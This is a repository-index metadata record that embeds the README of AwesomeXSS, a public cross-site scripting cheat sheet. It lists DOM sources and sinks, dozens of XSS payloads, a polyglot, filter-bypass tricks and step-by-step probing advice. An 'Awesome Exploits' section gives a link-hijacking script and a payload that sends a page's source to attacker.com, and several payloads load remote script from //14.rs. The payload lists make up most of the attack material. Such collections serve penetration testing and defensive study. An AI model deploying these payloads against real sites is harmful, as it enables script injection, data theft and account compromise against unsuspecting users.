{"id":13530064,"url":"https://github.com/s0md3v/AwesomeXSS","last_synced_at":"2025-04-01T17:31:49.692Z","repository":{"id":37432499,"uuid":"124765446","full_name":"s0md3v/AwesomeXSS","owner":"s0md3v","description":"Awesome XSS stuff","archived":false,"fork":false,"pushed_at":"2024-10-30T19:01:10.000Z","size":3654,"stargazers_count":4871,"open_issues_count":0,"forks_count":767,"subscribers_count":238,"default_branch":"master","last_synced_at":"2025-03-24T21:38:28.564Z","etag":null,"topics":["payload","payload-list","xss","xss-cheatsheet","xss-detection","xss-payloads"],"latest_commit_sha":null,"homepage":null,"language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/s0md3v.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"s0md3v","custom":"https://paypal.me/s0md3v"}},"created_at":"2018-03-11T14:35:30.000Z","updated_at":"2025-03-24T11:20:04.000Z","dependencies_parsed_at":"2022-07-20T12:17:29.101Z","dependency_job_id":"7a3d081d-3df3-4a40-978e-fb615c460a8c","html_url":"https://github.com/s0md3v/AwesomeXSS","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/s0md3v%2FAwesomeXSS","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/s0md3v%2FAwesomeXSS/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/s0md3v%2FAwesomeXSS/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/s0md3v%2FAwesomeXSS/manifests","owner_url":"htt
ps://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/s0md3v","download_url":"https://codeload.github.com/s0md3v/AwesomeXSS/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246680354,"owners_count":20816684,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["payload","payload-list","xss","xss-cheatsheet","xss-detection","xss-payloads"],"created_at":"2024-08-01T07:00:42.825Z","updated_at":"2025-04-01T17:31:48.126Z","avatar_url":"https://github.com/s0md3v.png","language":"JavaScript","funding_links":["https://github.com/sponsors/s0md3v","https://paypal.me/s0md3v"],"categories":["Uncategorized","JavaScript","\u003ca id=\"683b645c2162a1fce5f24ac2abfa1973\"\u003e\u003c/a\u003e漏洞\u0026\u0026漏洞管理\u0026\u0026漏洞发现/挖掘\u0026\u0026漏洞开发\u0026\u0026漏洞利用\u0026\u0026Fuzzing","Introduction","Resource","JavaScript (485)","\u003ca id=\"8c5a692b5d26527ef346687e047c5c21\"\u003e\u003c/a\u003e收集","Security \u0026 Hacking","Bugs"],"sub_categories":["Uncategorized","\u003ca id=\"5d7191f01544a12bdaf1315c3e986dff\"\u003e\u003c/a\u003eXSS\u0026\u0026XXE","XSS - Cross-Site Scripting","XSS"],"readme":"# AwesomeXSS\nThis repository is a collection of Awesome XSS resources. 
Contributions are welcome and should be submitted via an issue.\n\n### Awesome contents\n- [Challenges](https://github.com/s0md3v/AwesomeXSS#awesome-challenges)\n- [Reads \u0026 Presentations](https://github.com/s0md3v/AwesomeXSS#awesome-reads--presentations)\n- [Tools](https://github.com/s0md3v/AwesomeXSS#awesome-tools)\n- [Mind maps](https://github.com/s0md3v/AwesomeXSS#awesome-xss-mind-maps)\n- [DOM XSS](https://github.com/s0md3v/AwesomeXSS#awesome-dom-xss)\n- [Payloads](https://github.com/s0md3v/AwesomeXSS#awesome-payloads)\n- [Polyglots](https://github.com/s0md3v/AwesomeXSS#awesome-polyglots)\n- [Tags and event handlers](https://github.com/s0md3v/AwesomeXSS#awesome-tags--event-handlers)\n- [Context breaking](https://github.com/s0md3v/AwesomeXSS#awesome-context-breaking)\n    - [HTML context](https://github.com/s0md3v/AwesomeXSS#html-context)\n    - [Attribute context](https://github.com/s0md3v/AwesomeXSS#attribute-context)\n    - [JavaScript context](https://github.com/s0md3v/AwesomeXSS#javascript-context)\n- [Confirm Variants](https://github.com/s0md3v/AwesomeXSS#awesome-confirm-variants)\n- [Exploits](https://github.com/s0md3v/AwesomeXSS#awesome-exploits)\n- [Probing](https://github.com/s0md3v/AwesomeXSS#awesome-probing)\n- [Bypassing](https://github.com/s0md3v/AwesomeXSS#awesome-bypassing)\n- [Encoding](https://github.com/s0md3v/AwesomeXSS#awesome-encoding)\n- [Tips \u0026 tricks](https://github.com/s0md3v/AwesomeXSS#awesome-tips--tricks)\n\n### Awesome Challenges\n- [prompt.ml](https://prompt.ml)\n- [alf.nu/alert1](https://alf.nu/alert1)\n- [xss-game.appspot.com](https://xss-game.appspot.com)\n- [polyglot.innerht.ml](https://polyglot.innerht.ml)\n- [sudo.co.il/xss](http://sudo.co.il/xss)\n- [root-me.org](https://www.root-me.org/?page=recherche\u0026lang=en\u0026recherche=xss)\n- [chefsecure.com](https://chefsecure.com/courses/xss/challenges)\n- [wechall.net](https://www.wechall.net/challs/XSS)\n- 
[codelatte.id/labs/xss](https://codelatte.id/labs/xss)\n\n### Awesome Reads \u0026 Presentations\n- [Bypassing XSS Detection Mechanisms](https://github.com/s0md3v/MyPapers/tree/master/Bypassing-XSS-detection-mechanisms)\n- [XSS in Facebook via PNG Content Type](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)\n- [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc)\n- [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos)\n- [Blind XSS](https://www.youtube.com/watch?v=OT0fJEtz7aE)\n- [Copy Pest](https://www.slideshare.net/x00mario/copypest)\n\n### Awesome Tools\n- [XSStrike](https://github.com/UltimateHackers/XSStrike)\n- [BeEF](https://github.com/beefproject/beef)\n- [JShell](https://github.com/UltimateHackers/JShell)\n\n### Awesome XSS Mind Maps\nA beautiful XSS mind map by Jack Masa, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/jackmasa-mind-map.png)\n\n### Awesome DOM XSS\n\n- Does your input go into a sink? `Vulnerable`\n- It doesn't? `Not vulnerable`\n\n**Source**: An input that could be controlled by an external (untrusted) source.\n\n```\ndocument.URL\ndocument.documentURI\ndocument.URLUnencoded (IE 5.5 or later Only)\ndocument.baseURI\nlocation\nlocation.href\nlocation.search\nlocation.hash\nlocation.pathname\ndocument.cookie\ndocument.referrer\nwindow.name\nhistory.pushState()\nhistory.replaceState()\nlocalStorage\nsessionStorage\n```\n\n**Sink**: A potentially dangerous method that could lead to a vulnerability. 
In this case a DOM Based XSS.\n\n```\neval\nFunction\nsetTimeout\nsetInterval\nsetImmediate\nexecScript\ncrypto.generateCRMFRequest\nScriptElement.src\nScriptElement.text\nScriptElement.textContent\nScriptElement.innerText\nanyTag.onEventName\ndocument.write\ndocument.writeln\nanyElement.innerHTML\nRange.createContextualFragment\nwindow.location\ndocument.location\n```\n\nThis comprehensive list of sinks and source is taken from [domxsswiki](https://github.com/wisec/domxsswiki).\n\n### Awesome Payloads\n```\n\u003cA/hREf=\"j%0aavas%09cript%0a:%09con%0afirm%0d``\"\u003ez\n\u003cd3\"\u003c\"/onclick=\"1\u003e[confirm``]\"\u003c\"\u003ez\n\u003cd3/onmouseenter=[2].find(confirm)\u003ez\n\u003cdetails open ontoggle=confirm()\u003e\n\u003cscript y=\"\u003e\u003c\"\u003e/*\u003cscript* */prompt()\u003c/script\n\u003cw=\"/x=\"y\u003e\"/ondblclick=`\u003c`[confir\\u006d``]\u003ez\n\u003ca href=\"javascript%26colon;alert(1)\"\u003eclick\n\u003ca href=javas\u0026#99;ript:alert(1)\u003eclick\n\u003cscript/\"\u003ca\"/src=data:=\".\u003ca,[8].some(confirm)\u003e\n\u003csvg/x=\"\u003e\"/onload=confirm()//\n\u003c--`\u003cimg/src=` onerror=confirm``\u003e --!\u003e\n\u003csvg%0Aonload=%09((pro\\u006dpt))()//\n\u003csCript x\u003e(((confirm)))``\u003c/scRipt x\u003e\n\u003csvg \u003c/onload =\"1\u003e (_=prompt,_(1)) \"\"\u003e\n\u003c!--\u003e\u003cscript src=//14.rs\u003e\n\u003cembed src=//14.rs\u003e\n\u003cscript x=\"\u003e\" src=//15.rs\u003e\u003c/script\u003e\n\u003c!'/*\"/*/'/*/\"/*--\u003e\u003c/Script\u003e\u003cImage SrcSet=K */; OnError=confirm`1` //\u003e\n\u003ciframe/src \\/\\/onload = prompt(1)\n\u003cx oncut=alert()\u003ex\n\u003csvg onload=write()\u003e\n```\n\n### Awesome Polyglots\n\nHere's an XSS polyglot that I made which can break out of 20+ contexts:\n```\n%0ajavascript:`/*\\\"/*--\u003e\u0026lt;svg onload='/*\u003c/template\u003e\u003c/noembed\u003e\u003c/noscript\u003e\u003c/style\u003e\u003c/title\u003e\u003c/textarea\u003e\u003c/script\u003e\u003chtml 
onmouseover=\"/**/ alert()//'\"\u003e`\n```\n\nExplanation of how it works, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/polyglot.png)\n\n### Awesome Tags \u0026 Event Handlers\n- [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)\n- [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J)\n\nSome less detected event handlers\n```\nontoggle\nonauxclick\nondblclick\noncontextmenu\nonmouseleave\nontouchcancel\n```\n\nSome HTML Tags that you will be using\n```\nimg\nsvg\nbody\nhtml\nembed\nscript\nobject\ndetails\nisindex\niframe\naudio\nvideo\n```\n\n### Awesome Context Breaking\n\n#### HTML Context\nCase: `\u003ctag\u003eYou searched for $input. \u003c/tag\u003e`\n\n```\n\u003csvg onload=alert()\u003e\n\u003c/tag\u003e\u003csvg onload=alert()\u003e\n```\n\n#### Attribute Context\n\nCase: `\u003ctag attribute=\"$input\"\u003e`\n\n```\n\"\u003e\u003csvg onload=alert()\u003e\n\"\u003e\u003csvg onload=alert()\u003e\u003cb attr=\"\n\" onmouseover=alert() \"\n\"onmouseover=alert()//\n\"autofocus/onfocus=\"alert()\n```\n#### JavaScript Context\n\nCase: `\u003cscript\u003e var new something = '$input'; \u003c/script\u003e`\n\n```\n'-alert()-'\n'-alert()//'\n'}alert(1);{'\n'}%0Aalert(1);%0A{'\n\u003c/script\u003e\u003csvg onload=alert()\u003e\n```\n\n### Awesome Confirm Variants\nYep, confirm because alert is too mainstream.\n```\nconfirm()\nconfirm``\n(confirm``)\n{confirm``}\n[confirm``]\n(((confirm)))``\nco\\u006efirm()\nnew class extends confirm``{}\n[8].find(confirm)\n[8].map(confirm)\n[8].some(confirm)\n[8].every(confirm)\n[8].filter(confirm)\n[8].findIndex(confirm)\n```\n\n### Awesome Exploits\n##### Replace all links\n```javascript\nArray.from(document.getElementsByTagName(\"a\")).forEach(function(i) {\n  i.href = \"https://attacker.com\";\n});\n```\n##### Source Code Stealer\n```html\n\u003csvg/onload=\"(new 
Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML\"\u003e\n```\n\n### Awesome Probing\nIf none of this works, take a look at the **Awesome Bypassing** section.\n\nFirst of all, enter a non-malicious string like **d3v** and look at the source code to get an idea of the number and contexts of reflections.\n\u003cbr\u003eNow for attribute context, check if double quotes (\") are being filtered by entering `x\"d3v`. If it gets altered to `x\u0026quot;d3v`, chances are that the output is being properly escaped. If this happens, try doing the same for single quotes (') by entering `x'd3v`; if it gets altered to `x\u0026apos;`, you are doomed. The only thing you can try is encoding.\u003cbr\u003e\n
If the quotes are not being filtered, you can simply try payloads from the **Awesome Context Breaking** section.\n\u003cbr\u003eFor JavaScript context, check which quotes are being used, for example whether they are doing\n```\nvariable = 'value' or variable = \"value\"\n```\nNow let's say single quotes (') are in use; in that case enter `x'd3v`. If it gets altered to `x\\'d3v`, try escaping the backslash (\\) by adding a backslash to your probe, i.e. `x\\'d3v`. If it works, use the following payload:\n```\n\\'-alert()//\n```\nBut if it gets altered to `x\\\\\\'d3v`, the only thing you can try is closing the script tag itself by using\n```\n\u003c/script\u003e\u003csvg onload=alert()\u003e\n```\n
For simple HTML context, the probe is `x\u003cd3v`. If it gets altered to `x\u0026lt;d3v`, proper sanitization is in place. If it gets reflected as it is, you can enter a dummy tag to check for potential filters. The dummy tag I like to use is `x\u003cxxx\u003e`. If it gets stripped or altered in any way, it means the filter is looking for a pair of `\u003c` and `\u003e`. It can simply be bypassed using\n```\n\u003csvg onload=alert()//\n```\nor this (it will not work in all cases)\n```\n\u003csvg onload=alert()\n```\nIf your dummy tag lands in the source code as it is, go for any of these payloads\n```\n\u003csvg onload=alert()\u003e\n\u003cembed src=//14.rs\u003e\n\u003cdetails open ontoggle=alert()\u003e\n```\n\n### Awesome Bypassing\n\n**Note:** None of these payloads use single (') or double quotes (\").\n\n
- Without event handlers\n```\n\u003cobject data=javascript:confirm()\u003e\n\u003ca href=javascript:confirm()\u003eclick here\n\u003cscript src=//14.rs\u003e\u003c/script\u003e\n\u003cscript\u003econfirm()\u003c/script\u003e\n```\n- Without space\n```\n\u003csvg/onload=confirm()\u003e\n\u003ciframe/src=javascript:alert(1)\u003e\n```\n- Without slash (/)\n```\n\u003csvg onload=confirm()\u003e\n\u003cimg src=x onerror=confirm()\u003e\n```\n- Without equal sign (=)\n```\n\u003cscript\u003econfirm()\u003c/script\u003e\n```\n- Without closing angle bracket (\u003e)\n```\n\u003csvg onload=confirm()//\n```\n- Without alert, confirm, prompt\n```\n\u003cscript src=//14.rs\u003e\u003c/script\u003e\n\u003csvg onload=co\\u006efirm()\u003e\n\u003csvg onload=z=co\\u006efir\\u006d,z()\u003e\n```\n- Without a valid HTML tag\n```\n\u003cx onclick=confirm()\u003eclick here\n\u003cx ondrag=aconfirm()\u003edrag it\n```\n\n- Bypass tag blacklisting\n```\n\u003c/ScRipT\u003e\n\u003c/script\n\u003c/script/\u003e\n\u003c/script x\u003e\n```\n\n### Awesome Encoding\n\n
|HTML|Char|Numeric|Description|Hex|CSS (ISO)|JS (Octal)|URL|\n|----|----|-------|-----------|----|--------|----------|---|\n|`\u0026quot;`|\"|`\u0026#34;`|quotation mark|u+0022|\\0022|\\42|%22|\n|`\u0026num;`|#|`\u0026#35;`|number sign|u+0023|\\0023|\\43|%23|\n|`\u0026dollar;`|$|`\u0026#36;`|dollar sign|u+0024|\\0024|\\44|%24|\n|`\u0026percnt;`|%|`\u0026#37;`|percent sign|u+0025|\\0025|\\45|%25|\n|`\u0026amp;`|\u0026|`\u0026#38;`|ampersand|u+0026|\\0026|\\46|%26|\n|`\u0026apos;`|'|`\u0026#39;`|apostrophe|u+0027|\\0027|\\47|%27|\n|`\u0026lpar;`|(|`\u0026#40;`|left parenthesis|u+0028|\\0028|\\50|%28|\n|`\u0026rpar;`|)|`\u0026#41;`|right parenthesis|u+0029|\\0029|\\51|%29|\n|`\u0026ast;`|*|`\u0026#42;`|asterisk|u+002A|\\002a|\\52|%2A|\n|`\u0026plus;`|+|`\u0026#43;`|plus sign|u+002B|\\002b|\\53|%2B|\n|`\u0026comma;`|,|`\u0026#44;`|comma|u+002C|\\002c|\\54|%2C|\n|`\u0026minus;`|-|`\u0026#45;`|hyphen-minus|u+002D|\\002d|\\55|%2D|\n|`\u0026period;`|.|`\u0026#46;`|full stop; period|u+002E|\\002e|\\56|%2E|\n|`\u0026sol;`|/|`\u0026#47;`|solidus; slash|u+002F|\\002f|\\57|%2F|\n|`\u0026colon;`|:|`\u0026#58;`|colon|u+003A|\\003a|\\72|%3A|\n|`\u0026semi;`|;|`\u0026#59;`|semicolon|u+003B|\\003b|\\73|%3B|\n|`\u0026lt;`|\u003c|`\u0026#60;`|less-than|u+003C|\\003c|\\74|%3C|\n|`\u0026equals;`|=|`\u0026#61;`|equals|u+003D|\\003d|\\75|%3D|\n|`\u0026gt;`|\u003e|`\u0026#62;`|greater-than sign|u+003E|\\003e|\\76|%3E|\n|`\u0026quest;`|?|`\u0026#63;`|question mark|u+003F|\\003f|\\77|%3F|\n|`\u0026commat;`|@|`\u0026#64;`|at sign; commercial at|u+0040|\\0040|\\100|%40|\n|`\u0026lsqb;`|\\[|`\u0026#91;`|left square bracket|u+005B|\\005b|\\133|%5B|\n|`\u0026bsol;`|\u0026bsol;|`\u0026#92;`|backslash|u+005C|\\005c|\\134|%5C|\n|`\u0026rsqb;`|]|`\u0026#93;`|right square bracket|u+005D|\\005d|\\135|%5D|\n|`\u0026Hat;`|^|`\u0026#94;`|circumflex accent|u+005E|\\005e|\\136|%5E|\n|`\u0026lowbar;`|_|`\u0026#95;`|low line|u+005F|\\005f|\\137|%5F|\n|`\u0026grave;`|\\`|`\u0026#96;`|grave accent|u+0060|\\0060|\\u0060|%60|\n|`\u0026lcub;`|{|`\u0026#123;`|left curly bracket|u+007B|\\007b|\\173|%7B|\n|`\u0026verbar;`|\\||`\u0026#124;`|vertical bar|u+007C|\\007c|\\174|%7C|\n|`\u0026rcub;`|}|`\u0026#125;`|right curly bracket|u+007D|\\007d|\\175|%7D|\n\n### Awesome Tips \u0026 Tricks\n
- `http(s)://` can be shortened to `//` or `/\\\\` or `\\\\`.\n- `document.cookie` can be shortened to `cookie`. This applies to other DOM objects as well.\n- alert and other pop-up functions don't need a value, so stop doing `alert('XSS')` and start doing `alert()`.\n- You can use `//` to close a tag instead of `\u003e`.\n- I have found that `confirm` is the least detected pop-up function, so stop using `alert`.\n- Quotes around an attribute value aren't necessary as long as it doesn't contain spaces. You can use `\u003cscript src=//14.rs\u003e` instead of `\u003cscript src=\"//14.rs\"\u003e`.\n- The shortest HTML context XSS payload is `\u003cscript src=//14.rs\u003e` (19 chars).\n\n### Awesome Credits\nAll the payloads are crafted by me unless specified.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fs0md3v%2FAwesomeXSS","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fs0md3v%2FAwesomeXSS","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fs0md3v%2FAwesomeXSS/lists"}